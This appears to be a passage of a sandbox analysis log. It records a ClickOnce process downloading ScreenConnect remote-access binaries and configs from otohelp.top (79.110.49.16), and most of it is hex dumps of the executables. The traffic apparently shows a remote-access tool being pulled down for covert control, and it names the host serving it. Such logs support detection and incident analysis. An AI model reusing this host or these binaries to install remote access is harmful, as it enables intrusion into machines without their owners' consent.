2024-10-02 04:25:24 UTC	16384	IN	Data Raw: 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00 Data Ascii: ThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_Item
2024-10-02 04:25:24 UTC	12280	IN	Data Raw: 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 Data Ascii: Connect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion24.2.10.8991BAssembly Version24.2.10.8991

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49727	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:24 UTC	107	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:25 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:24 GMT Connection: close
2024-10-02 04:25:25 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49728	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:25 UTC	102	OUT	GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:25 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:24 GMT Connection: close
2024-10-02 04:25:25 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49729	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:26 UTC	110	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:26 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:26 GMT Connection: close
2024-10-02 04:25:26 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49730	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:27 UTC	100	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:27 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 81696 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:26 GMT Connection: close
2024-10-02 04:25:27 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
2024-10-02 04:25:27 UTC	16384	IN	Data Raw: 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 d2 59 fd a1 c3 db f8 b2 a8 38 41 41 b5 70 2f b9 70 e0 44 04 4a 6f 16 7f 54 f3 2d 91 6d bf ac 66 21 46 ef be d1 1e 85 dd 2b 75 b8 ff 7a 0d c8 39 d0 7b 2a 86 54 8d 79 d9 5d b2 8a 3c 12 a6 c1 3c 94 5c c5 c2 54 9b e5 b0 38 01 34 d6 47 4a 0b 62 7d 82 0a bc 8e 63 9f ae dc 13 7e 39 98 c7 b5 f2 fd 11 5b 4c 23 82 a4 fd 40 df 22 18 d8 3f 0b 56 59 b3 b5 88 4c 17 d4 e9 59 bc f3 d5 72 d6 78 1b 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34 Data Ascii: -452b-8975-74a85828d354TextStateY8AAp/pDJoT-mf!F+uz9{*Ty]<<\T84GJb}c~9[L#@"?VYLYrx{^@RSDSL[M9iHF4
2024-10-02 04:25:27 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
2024-10-02 04:25:27 UTC	16384	IN	Data Raw: 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00 Data Ascii: fffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
2024-10-02 04:25:27 UTC	16376	IN	Data Raw: 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49731	79.110.49.16	443	6456	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:25:28 UTC	88	OUT	GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:25:28 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 197120 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:25:28 GMT Connection: close
2024-10-02 04:25:28 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
2024-10-02 04:25:28 UTC	16384	IN	Data Raw: 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a Data Ascii: &rYpov&(, ow&}ow&o)*.(&(^uw,w(0@surpov&rYpov&(, ow&}ow&o).(&(^ux,x(*0@su
2024-10-02 04:25:28 UTC	16384	IN	Data Raw: 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
2024-10-02 04:25:29 UTC	16384	IN	Data Raw: 01 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
2024-10-02 04:25:29 UTC	16384	IN	Data Raw: b2 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00 Data Ascii: +{>+Bd+/q+PX!++j,f f,f f: ,t',x)*f2vV
2024-10-02 04:25:29 UTC	16384	IN	Data Raw: 1c 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15 Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkk
2024-10-02 04:25:29 UTC	16384	IN	Data Raw: 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74 Data Ascii: RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadat
2024-10-02 04:25:29 UTC	16384	IN	Data Raw: 6b 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 4f 70 65 6e 4d 6f 6e 69 74 6f 72 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6e 74 72 6f 6c 50 61 6e 65 6c 4d 65 73 73 61 67 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 43 6c 69 70 62 6f 61 72 64 4b 65 79 73 74 72 6f 6b 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 53 65 6e 64 46 69 6c 65 73 2e 70 6e 67 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 50 72 6f 70 65 72 74 69 65 73 2e 43 6f 6d 6d 61 6e 64 52 65 63 65 69 76 Data Ascii: kMonitor.pngScreenConnect.Properties.CommandOpenMonitor.pngScreenConnect.Properties.ControlPanelMessages.pngScreenConnect.Properties.CommandSendClipboardKeystrokes.pngScreenConnect.Properties.CommandSendFiles.pngScreenConnect.Properties.CommandReceiv
2024-10-02 04:25:29 UTC	16384	IN	Data Raw: 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 3b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 53 00 6f 00 75 00 6e 00 64 00 43 00 61 00 70 00 74 00 75 00 72 00 65 00 4d 00 6f 00 64 00 65 00 20 00 3d 00 20 00 00 2b 53 00 65 00 6c 00 65 00 63 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 27 4d 00 75 00 74 00 65 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 31 53 00 65 00 74 00 53 00 70 00 65 00 61 00 6b 00 65 00 72 00 73 00 56 00 6f 00 6c 00 75 00 6d 00 65 00 43 00 6f 00 6d 00 6d 00 61 00 6e 00 64 00 00 13 56 00 6f 00 6c 00 Data Ascii: ommand;SelectSoundCaptureModeCommand'SoundCaptureMode = +SelectSpeakersCommand'MuteSpeakersCommand1SetSpeakersVolumeCommandVol
